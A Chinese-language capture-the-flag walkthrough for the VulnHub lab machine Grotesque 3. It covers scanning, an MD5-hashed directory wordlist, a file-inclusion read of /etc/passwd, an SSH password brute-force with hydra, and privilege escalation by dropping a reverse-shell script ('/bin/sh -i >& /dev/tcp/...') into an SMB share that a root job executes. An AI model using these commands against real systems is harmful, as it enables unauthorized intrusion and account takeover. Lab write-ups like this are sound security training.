1.信息收集
靶机下载地址:https://download.vulnhub.com/grotesque/grotesque3.zip
设置成NAT模式打开
扫不到ip去修改网卡后扫到IP
arp-scan -l
dirb -u http://192.168.10.152
nmap -sV 192.168.10.152 -p-
2.漏洞发现
访问ip发现提示看看地图
、
点开地图看看
md五个x,可能是md5加密
目录扫描没有发现什么有价值的东西
进行网站指纹识别
whatweb http://192.168.10.152
目录扫描没有找到什么有用的东西,猜测应该是字典的问题,既然提示了md5,可能是md5加密之后的地址
for i in $(cat /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt); do echo $i | md5sum >> Desktop/4.txt; done
#将 /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt 字典进行md5加密
重新使用 gobuster 工具扫描目录
gobuster dir -w Desktop/4.txt -u http://192.168.10.152 -x php,html,txt,zip,bak
发现扫描不出来,原因是加密后会有个-删除后重新扫描
扫描出来的URL:/f66b22bf020334b04c7d0d3eb5010391.php
访问后查看源代码,发现什么也没有
使用模糊测试的方式
wfuzz -c -w /usr/share/wordlists/dirb/big.txt --hw 0 -u http://192.168.10.152/f66b22bf020334b04c7d0d3eb5010391.php\?FUZZ=/etc/passwd
扫描出来的url:http://192.168.10.152/f66b22bf020334b04c7d0d3eb5010391.php?purpose=/etc/passwd
查看源代码,发现用户freddie和root操作系统都是 /bin/bash
继续使用之前制作的md5字典去爆破ssh(freddie),得到了账号密码(freddie、61a4e3e60c063d1e472dd780f64e6cad)
hydra -l freddie -P 4.txt ssh://192.168.10.152
然后去ssh连接,找到第一个flag
3.提权
papy64和linpeas.sh下载
papy64下载地址:GitHub - DominicBreuker/pspy: Monitor linux processes without root permissions
linpeas.sh下载地址:GitHub - carlospolop/PEASS-ng: PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)
扫描结果比较多的多,往下面多扒拉一下,就会发现每隔一段时间就以root
权限运行/smbshare/目录下的所有文件
我们用ss -lulnp
看一下,发现了有一个445的smb
端口,之前用nmap没扫到,那么我们就可以直接操作了
在kali中开启一个监听反弹shell
写入一个shell:echo '/bin/sh -i >& /dev/tcp/192.168.10.136/9999 0>&1' >shell.sh
用smbclient -L //127.0.0.1/
查看目录
把-L
去掉,进入命令环境,并且用put
指令上传一下这个shell
smbclient //127.0.0.1/grotesque
put shell.sh
发现kali监听到